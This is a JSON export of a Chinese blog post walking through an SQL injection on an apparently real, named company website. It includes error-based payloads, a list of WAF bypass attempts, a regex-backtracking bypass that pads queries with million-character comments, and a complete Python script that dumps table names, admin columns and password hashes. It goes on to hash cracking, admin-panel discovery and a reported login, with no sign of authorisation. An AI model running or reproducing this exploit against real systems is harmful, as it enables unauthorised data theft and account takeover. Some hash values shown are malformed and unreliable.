{"id":58,"date":"2026-01-30T19:03:00","date_gmt":"2026-01-30T11:03:00","guid":{"rendered":"https:\/\/danchengjie.cn\/?p=58"},"modified":"2026-03-30T21:46:20","modified_gmt":"2026-03-30T13:46:20","slug":"1000000%e6%ad%a3%e5%88%99%e5%9b%9e%e6%ba%af%e7%bb%95%e8%bf%87%e6%ad%a3%e5%88%99%e5%ae%9e%e7%8e%b0sql%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/danchengjie.cn\/index.php\/2026\/01\/30\/1000000%e6%ad%a3%e5%88%99%e5%9b%9e%e6%ba%af%e7%bb%95%e8%bf%87%e6%ad%a3%e5%88%99%e5%ae%9e%e7%8e%b0sql%e6%b3%a8%e5%85%a5\/","title":{"rendered":"1000000\u6b63\u5219\u56de\u6eaf\u7ed5\u8fc7\u6b63\u5219\u5b9e\u73b0SQL\u6ce8\u5165"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u4fe1\u606f\u6536\u96c6\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86\"><\/a>\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u53d1\u73b0GET\u6ce8\u5165\u70b9\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E5%8F%91%E7%8E%B0GET%E6%B3%A8%E5%85%A5%E7%82%B9\"><\/a>\u53d1\u73b0GET\u6ce8\u5165\u70b9<\/h3>\n\n\n\n<p>\u9996\u5148\u5728&nbsp;<code>news_list.php<\/code>&nbsp;\u53d1\u73b0 GET \u53c2\u6570&nbsp;<code>cid<\/code>&nbsp;\u5b58\u5728 SQL \u6ce8\u5165\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/www.cqzszy.com.cn\/news_list.php?cid=11 and updatexml(1,concat(0x7e,user(),0x7e),1)<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u8fd4\u56de\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>XPATH syntax error: '~qzy_cqzszy@localhost~'<\/code><\/pre>\n\n\n\n<p>\u6210\u529f\u83b7\u53d6\u6570\u636e\u5e93\u7528\u6237\u4fe1\u606f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.olsp.top\/img\/image-20260302151226510.png\"><img decoding=\"async\" src=\"https:\/\/www.olsp.top\/img\/image-20260302151226510.png\" alt=\"image-20260302151226510\"\/><\/a><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"WAF\u5206\u6790\">\u5206\u6790<\/h3>\n\n\n\n<p>\u901a\u8fc7\u6d4b\u8bd5\u63a8\u6d4b \u6b63\u5219 \u8fc7\u6ee4\u89c4\u5219\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Payload<\/th><th>\u7ed3\u679c<\/th><th>\u5206\u6790<\/th><\/tr><\/thead><tbody><tr><td><code>select 1<\/code><\/td><td>\u6210\u529f\u56de\u663e<\/td><td><code>select<\/code>&nbsp;\u5355\u72ec\u4e0d\u88ab\u8fc7\u6ee4<\/td><\/tr><tr><td><code>from 1<\/code><\/td><td>\u62a5\u9519\u56de\u663e<\/td><td><code>from<\/code>&nbsp;\u5355\u72ec\u4e0d\u88ab\u8fc7\u6ee4<\/td><\/tr><tr><td><code>select 1 from dual<\/code><\/td><td>\u7a7a\u767d\u56de\u663e<\/td><td><code>select...from<\/code>&nbsp;\u7ec4\u5408\u88ab\u8fc7\u6ee4<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>\u7ed3\u8bba<\/strong>\uff1aWAF \u4f7f\u7528<mark>\u6b63\u5219<\/mark>&nbsp;<code>select(.*)from<\/code>&nbsp;\u8fc7\u6ee4\uff0c\u5355\u72ec\u7684&nbsp;<code>select<\/code>&nbsp;\u6216&nbsp;<code>from<\/code>&nbsp;\u4e0d\u88ab\u62e6\u622a\uff0c\u53ea\u6709\u7ec4\u5408\u65f6\u624d\u89e6\u53d1\u8fc7\u6ee4\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"GET\u6ce8\u5165\u7684\u95ee\u9898\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#GET%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98\"><\/a>GET\u6ce8\u5165\u7684\u95ee\u9898<\/h3>\n\n\n\n<p>\u5c1d\u8bd5<mark>\u6b63\u5219<\/mark>\u56de\u6eaf\u7ed5\u8fc7\uff0c\u6784\u9020\u8d85\u957f Payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>URL length: 100224\nResponse: 414 Request-URI Too Large<\/code><\/pre>\n\n\n\n<p><strong>\u95ee\u9898<\/strong>\uff1aURL \u957f\u5ea6\u8d85\u8fc7\u670d\u52a1\u5668\u9650\u5236\uff0c\u65e0\u6cd5\u4f7f\u7528 GET \u8bf7\u6c42\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5bfb\u627ePOST\u6ce8\u5165\u70b9\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E5%AF%BB%E6%89%BEPOST%E6%B3%A8%E5%85%A5%E7%82%B9\"><\/a>\u5bfb\u627ePOST\u6ce8\u5165\u70b9<\/h3>\n\n\n\n<p>\u7531\u4e8e GET \u8bf7\u6c42\u957f\u5ea6\u9650\u5236\uff0c\u9700\u8981\u5bfb\u627e POST \u6ce8\u5165\u70b9\u3002\u5728\u7f51\u7ad9\u529f\u80fd\u9875\u9762\u53d1\u73b0\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/order_sell.php HTTP\/1.1\nHost: www.cqzszy.com.cn\nContent-Type: application\/x-www-form-urlencoded\n\np1=1&amp;m1=0&amp;t1=0&amp;...&amp;bs=1'&amp;ac=sell<\/code><\/pre>\n\n\n\n<p>\u6d4b\u8bd5\u53c2\u6570&nbsp;<code>bs<\/code>&nbsp;\u5b58\u5728\u6ce8\u5165\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1772425757')' at line 1<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.olsp.top\/img\/image-20260302151304796.png\"><img decoding=\"async\" src=\"https:\/\/www.olsp.top\/img\/image-20260302151304796.png\" alt=\"image-20260302151304796\"\/><\/a><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u7ed5\u8fc7\u601d\u8def\u63a2\u7d22\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%8E%A2%E7%B4%A2\"><\/a>\u7ed5\u8fc7\u601d\u8def\u63a2\u7d22<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5c1d\u8bd5\u7684\u7ed5\u8fc7\u65b9\u6cd5\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E5%B0%9D%E8%AF%95%E7%9A%84%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95\"><\/a>\u5c1d\u8bd5\u7684\u7ed5\u8fc7\u65b9\u6cd5<\/h3>\n\n\n\n<p>\u5728\u53d1\u73b0<mark>\u6b63\u5219<\/mark>\u56de\u6eaf\u4e4b\u524d\uff0c\u5c1d\u8bd5\u4e86\u591a\u79cd\u7ed5\u8fc7\u65b9\u5f0f\uff1a<\/p>\n\n\n\n<p><strong>\u6362\u884c\u7b26\u6253\u65ad<mark>\u6b63\u5219<\/mark><\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select%0a1%0afrom dual\nselect%0b1%0bfrom dual<\/code><\/pre>\n\n\n\n<p><strong>\u6ce8\u91ca\u6253\u65ad<mark>\u6b63\u5219<\/mark><\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select\/**\/1\/**\/from\/**\/dual<\/code><\/pre>\n\n\n\n<p><strong>\u5185\u8054\u6ce8\u91ca<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select\/*!*\/1\/*!*\/from\/*!*\/dual\nselect\/*!50000*\/1\/*!50000*\/from\/*!50000*\/dual<\/code><\/pre>\n\n\n\n<p><strong>\u5927\u5c0f\u5199\u6df7\u5408<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SeLeCt 1 FrOm dual<\/code><\/pre>\n\n\n\n<p><strong>\u53cc\u5199\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>selselectect 1 frfromom dual<\/code><\/pre>\n\n\n\n<p><strong>\u7a7a\u5b57\u8282\u622a\u65ad<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sel%00ect 1 fr%00om dual<\/code><\/pre>\n\n\n\n<p><strong>\u9884\u5904\u7406\u8bed\u53e5<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set @a=concat('sel','ect 1 fr','om dual');prepare stmt from @a;execute stmt;<\/code><\/pre>\n\n\n\n<p><strong>\u66ff\u4ee3\u8bed\u53e5<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>show tables\nhandler table_name open<\/code><\/pre>\n\n\n\n<p><strong>\u7ed3\u679c<\/strong>\uff1a\u4ee5\u4e0a\u65b9\u6cd5\u5168\u90e8\u5931\u8d25\uff0c\u8fd4\u56de\u7a7a\u767d\u56de\u663e\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u6b63\u5219\u56de\u6eaf\u539f\u7406\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E6%AD%A3%E5%88%99%E5%9B%9E%E6%BA%AF%E5%8E%9F%E7%90%86\"><\/a><mark>\u6b63\u5219<\/mark>\u56de\u6eaf\u539f\u7406<\/h3>\n\n\n\n<p>PHP PCRE \u9ed8\u8ba4\u56de\u6eaf\u9650\u5236\u4e3a 100 \u4e07\u6b21\u3002\u5f53<mark>\u6b63\u5219<\/mark>&nbsp;<code>select(.*)from<\/code>&nbsp;\u5339\u914d\u8d85\u957f\u5b57\u7b26\u4e32\u65f6\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>.*<\/code>&nbsp;\u8d2a\u5a6a\u5339\u914d\u5230\u5b57\u7b26\u4e32\u672b\u5c3e<\/li>\n\n\n\n<li>\u56de\u6eaf\u67e5\u627e&nbsp;<code>from<\/code><\/li>\n\n\n\n<li>\u56de\u6eaf\u6b21\u6570\u8d85\u8fc7\u9650\u5236\uff0c<code>preg_match<\/code>&nbsp;\u8fd4\u56de&nbsp;<code>false<\/code><\/li>\n\n\n\n<li>WAF \u5224\u65ad\u5931\u6548\uff0c\u653e\u884c\u8bf7\u6c42<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u6784\u9020Payload\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E6%9E%84%E9%80%A0Payload\"><\/a>\u6784\u9020Payload<\/h3>\n\n\n\n<p>\u5173\u952e\uff1a\u7528\u6ce8\u91ca&nbsp;<code>\/**\/<\/code>&nbsp;\u5305\u88f9\u5783\u573e\u5b57\u7b26<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select\/*{100\u4e07\u5b57\u7b26}*\/column from\/*{100\u4e07\u5b57\u7b26}*\/table<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>MySQL \u5ffd\u7565\u6ce8\u91ca\uff0c\u6b63\u5e38\u6267\u884c SQL<\/li>\n\n\n\n<li>WAF&nbsp;<mark>\u6b63\u5219<\/mark>\u5339\u914d\u8d85\u65f6\uff0c\u7ed5\u8fc7\u6210\u529f<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u6ce8\u5165\u8fc7\u7a0b\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E6%B3%A8%E5%85%A5%E8%BF%87%E7%A8%8B\"><\/a>\u6ce8\u5165\u8fc7\u7a0b<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Python\u811a\u672c\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#Python%E8%84%9A%E6%9C%AC\"><\/a>Python\u811a\u672c<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport re\n\nurl = \"http:\/\/www.cqzszy.com.cn\/order_sell.php\"\njunk = \"a\" * 1000000\n\n\ndef inject(payload_str):\npayload = {\n\"Submit\": \"\u63d0\u4ea4\u4ea4\u6613\u4fe1\u606f\", \"ac\": \"sell\",\n\"bs\": payload_str,\n\"c1\": \"1\", \"c2\": \"1\", \"c3\": \"1\", \"c4\": \"1\", \"c5\": \"1\", \"c6\": \"1\", \"c7\": \"1\",\n\"lang\": \"cn\", \"m1\": \"0\", \"m2\": \"0\", \"m3\": \"0\", \"m4\": \"0\", \"m5\": \"0\",\n\"p1\": \"test\", \"p2\": \"1\", \"p3\": \"1\", \"p4\": \"1\", \"p5\": \"1\",\n\"t1\": \"0\", \"t2\": \"0\", \"t3\": \"0\", \"t4\": \"0\", \"t5\": \"0\"\n}\nr = requests.post(url, data=payload, timeout=60)\nm = re.search(r\"'~(.*?)~'\", r.text)\nreturn m.group(1) if m else None\n\n\n# \u83b7\u53d6\u8868\u540d\nprint(\"=== \u8868\u540d ===\")\nfor i in range(20):\nsql = f\"1' and updatexml(1,concat(0x7e,(select\/*{junk}*\/table_name from\/*{junk}*\/information_schema.tables where table_schema=database() limit {i},1),0x7e),1) and '1'='1\"\nresult = inject(sql)\nif result:\nprint(f\"&#91;{i}] {result}\")\nelse:\nbreak\n\n# \u83b7\u53d6 zszy_admin \u5217\u540d\nprint(\"\\n=== zszy_admin \u5217\u540d ===\")\nfor i in range(10):\nsql = f\"1' and updatexml(1,concat(0x7e,(select\/*{junk}*\/column_name from\/*{junk}*\/information_schema.columns where table_schema=database() and table_name='zszy_admin' limit {i},1),0x7e),1) and '1'='1\"\nresult = inject(sql)\nif result:\nprint(f\"&#91;{i}] {result}\")\nelse:\nbreak\n\n# \u83b7\u53d6 zszy_admin \u6570\u636e - \u5206\u5f00\u83b7\u53d6\nprint(\"\\n=== zszy_admin \u6570\u636e ===\")\nfor i in range(3):\nprint(f\"\\n--- \u7b2c {i + 1} \u6761\u8bb0\u5f55 ---\")\n\nsql = f\"1' and updatexml(1,concat(0x7e,(select\/*{junk}*\/aid from\/*{junk}*\/zszy_admin limit {i},1),0x7e),1) and '1'='1\"\nprint(f\"aid: {inject(sql)}\")\n\nsql = f\"1' and updatexml(1,concat(0x7e,(select\/*{junk}*\/aname from\/*{junk}*\/zszy_admin limit {i},1),0x7e),1) and '1'='1\"\nprint(f\"aname: {inject(sql)}\")\n\nsql = f\"1' and updatexml(1,concat(0x7e,(select\/*{junk}*\/apassword from\/*{junk}*\/zszy_admin limit {i},1),0x7e),1) and '1'='1\"\nprint(f\"apassword: {inject(sql)}\")<\/code><\/pre>\n\n\n\n<p><code>\u6570\u636e\u6ce8\u5165\u5931\u8d25<\/code><\/p>\n\n\n\n<p>\u5206\u6bb5\u6ce8\u5165\u6570\u636e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u83b7\u53d6\u7684\u6570\u636e\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E8%8E%B7%E5%8F%96%E7%9A%84%E6%95%B0%E6%8D%AE\"><\/a>\u83b7\u53d6\u7684\u6570\u636e<\/h3>\n\n\n\n<p><strong>\u6570\u636e\u5e93\u8868\u540d\uff1a<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5e8f\u53f7<\/th><th>\u8868\u540d<\/th><\/tr><\/thead><tbody><tr><td>0<\/td><td>zszy_admin<\/td><\/tr><tr><td>1<\/td><td>zszy_ec_class<\/td><\/tr><tr><td>2<\/td><td>zszy_ec_goods<\/td><\/tr><tr><td>3<\/td><td>zszy_human<\/td><\/tr><tr><td>4<\/td><td>zszy_info<\/td><\/tr><tr><td>5<\/td><td>zszy_member<\/td><\/tr><tr><td>6<\/td><td>zszy_order<\/td><\/tr><tr><td>\u2026<\/td><td>\u2026<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>\u7ba1\u7406\u5458\u8868\u5217\u540d\uff1a<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5e8f\u53f7<\/th><th>\u5217\u540d<\/th><\/tr><\/thead><tbody><tr><td>0<\/td><td>aid<\/td><\/tr><tr><td>1<\/td><td>aname<\/td><\/tr><tr><td>2<\/td><td>apassword<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>\u7ba1\u7406\u5458\u8d26\u53f7\u5bc6\u7801\uff1a<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u5bc6\u7801\u89e3\u5bc6\u4e0e\u540e\u53f0\u53d1\u73b0\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E5%AF%86%E7%A0%81%E8%A7%A3%E5%AF%86%E4%B8%8E%E5%90%8E%E5%8F%B0%E5%8F%91%E7%8E%B0\"><\/a><\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>aname<\/td><td>apassword (MD5)<\/td><\/tr><tr><td><br>admin<\/td><td><br>3b1c29af405bac431b8f5ae71345fdcasdav<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p id=\"\u5bc6\u7801\u89e3\u5bc6\u4e0e\u540e\u53f0\u53d1\u73b0\">\u5bc6\u7801\u89e3\u5bc6\u4e0e\u540e\u53f0\u53d1\u73b0<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"MD5\u89e3\u5bc6\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#MD5%E8%A7%A3%E5%AF%86\"><\/a>MD5\u89e3\u5bc6<\/h3>\n\n\n\n<p>\u4f7f\u7528\u5728\u7ebf\u5de5\u5177\u89e3\u5bc6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>admin:&nbsp;<code>3b1c29af405bac431b8f5ae71345fvdadca<\/code>&nbsp;\u2192 \u672a\u89e3\u51fa<\/li>\n\n\n\n<li>leo:&nbsp;<code>bf7c2c3a34f5da034b14e89486f97fda1v6<\/code>&nbsp;\u2192&nbsp;<strong>c****e<\/strong><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u76ee\u5f55\u626b\u63cf\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F\"><\/a>\u76ee\u5f55\u626b\u63cf<\/h3>\n\n\n\n<p>\u4f7f\u7528 dirsearch \u626b\u63cf\u540e\u53f0\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>dirsearch -u http:\/\/www.cqzszy.com.cn -e php<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u53d1\u73b0\u540e\u53f0\u767b\u5f55\u9875\u9762\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>[200] http:\/\/www.cqzszy.com.cn\/admini\/login.php<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u6210\u529f\u767b\u5f55\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E6%88%90%E5%8A%9F%E7%99%BB%E5%BD%95\"><\/a>\u6210\u529f\u767b\u5f55<\/h3>\n\n\n\n<p>\u8bbf\u95ee&nbsp;<code>\/admini\/login.php<\/code>\uff0c\u4f7f\u7528\u83b7\u53d6\u7684\u51ed\u8bc1\u767b\u5f55\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7528\u6237\u540d\uff1aleo<\/li>\n\n\n\n<li>\u5bc6\u7801\uff1a\u2014\u2014\u2014<\/li>\n<\/ul>\n\n\n\n<p>\u767b\u5f55\u6210\u529f\uff0c\u8fdb\u5165\u540e\u53f0\u7ba1\u7406\u7cfb\u7edf\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.olsp.top\/img\/image-20260302151432891.png\"><img decoding=\"async\" src=\"https:\/\/www.olsp.top\/img\/image-20260302151432891.png\" alt=\"image-20260302151432891\"\/><\/a><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u603b\u7ed3\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E6%80%BB%E7%BB%93\"><\/a>\u603b\u7ed3<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u653b\u51fb\u94fe\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E6%94%BB%E5%87%BB%E9%93%BE\"><\/a>\u653b\u51fb\u94fe<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>GET\u6ce8\u5165\u53d1\u73b0 \u2192 URL\u957f\u5ea6\u9650\u5236 \u2192 \u5bfb\u627ePOST\u6ce8\u5165\u70b9 \u2192 \u591a\u79cd\u7ed5\u8fc7\u5c1d\u8bd5\u5931\u8d25 \u2192 <mark>\u6b63\u5219<\/mark>\u56de\u6eaf\u7ed5\u8fc7 \u2192 \u5206\u6bb5\u83b7\u53d6\u5bc6\u7801 \u2192 \u5bc6\u7801\u89e3\u5bc6 \u2192 \u540e\u53f0\u626b\u63cf \u2192 \u6210\u529f\u767b\u5f55<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5173\u952e\u6280\u672f\u70b9\"><a href=\"https:\/\/www.olsp.top\/case\/Regex-Backtracking-WAF-Bypass-SQL-Injection\/?highlight=%E6%AD%A3%E5%88%99#%E5%85%B3%E9%94%AE%E6%8A%80%E6%9C%AF%E7%82%B9\"><\/a>\u5173\u952e\u6280\u672f\u70b9<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<ul class=\"wp-block-list\">\n<li><strong>GET\u8f6cPOST<\/strong>\uff1aGET\u8bf7\u6c42URL\u957f\u5ea6\u9650\u5236\uff0c\u6539\u7528POST\u6ce8\u5165<\/li>\n\n\n\n<li><strong>\u591a\u79cd\u7ed5\u8fc7\u5c1d\u8bd5<\/strong>\uff1a\u6362\u884c\u7b26\u3001\u6ce8\u91ca\u3001\u5927\u5c0f\u5199\u3001\u53cc\u5199\u3001\u9884\u5904\u7406\u7b49\u5747\u5931\u8d25<\/li>\n\n\n\n<li><strong><mark>\u6b63\u5219<\/mark>\u56de\u6eaf\u7ed5\u8fc7<\/strong>\uff1a\u5229\u7528 PHP PCRE \u56de\u6eaf\u9650\u5236\uff08100\u4e07\u6b21\uff09\uff0c\u6784\u9020\u8d85\u957f\u6ce8\u91ca\u7ed5\u8fc7&nbsp;<code>select(.*)from<\/code>&nbsp;<mark>\u6b63\u5219<\/mark><\/li>\n\n\n\n<li><strong>\u6ce8\u91ca\u5305\u88f9<\/strong>\uff1a\u5783\u573e\u5b57\u7b26\u5fc5\u987b\u7528&nbsp;<code>\/**\/<\/code>&nbsp;\u5305\u88f9\uff0cMySQL\u624d\u80fd\u6b63\u5e38\u6267\u884c<\/li>\n\n\n\n<li><strong>\u5206\u6bb5\u83b7\u53d6<\/strong>\uff1a\u4f7f\u7528&nbsp;<code>substr()<\/code>&nbsp;\u5206\u6bb5\u83b7\u53d6\u957f\u5b57\u6bb5\uff0c\u907f\u514d\u622a\u65ad<\/li>\n<\/ul>\n<\/blockquote>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4fe1\u606f\u6536\u96c6 \u53d1\u73b0GET\u6ce8\u5165\u70b9 \u9996\u5148\u5728&nbsp;news_list.php&nbsp;\u53d1\u73b0 GET \u53c2\u6570&#038;nbs [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[9,8,10],"class_list":["post-58","post","type-post","status-publish","format-standard","hentry","category-stcs","tag-regex","tag-sql","tag-10"],"_links":{"self":[{"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/posts\/58","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":10,"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions"}],"predecessor-version":[{"id":90,"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions\/90"}],"wp:attachment":[{"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/media?parent=58"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/categories?post=58"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/danchengjie.cn\/index.php\/wp-json\/wp\/v2\/tags?post=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}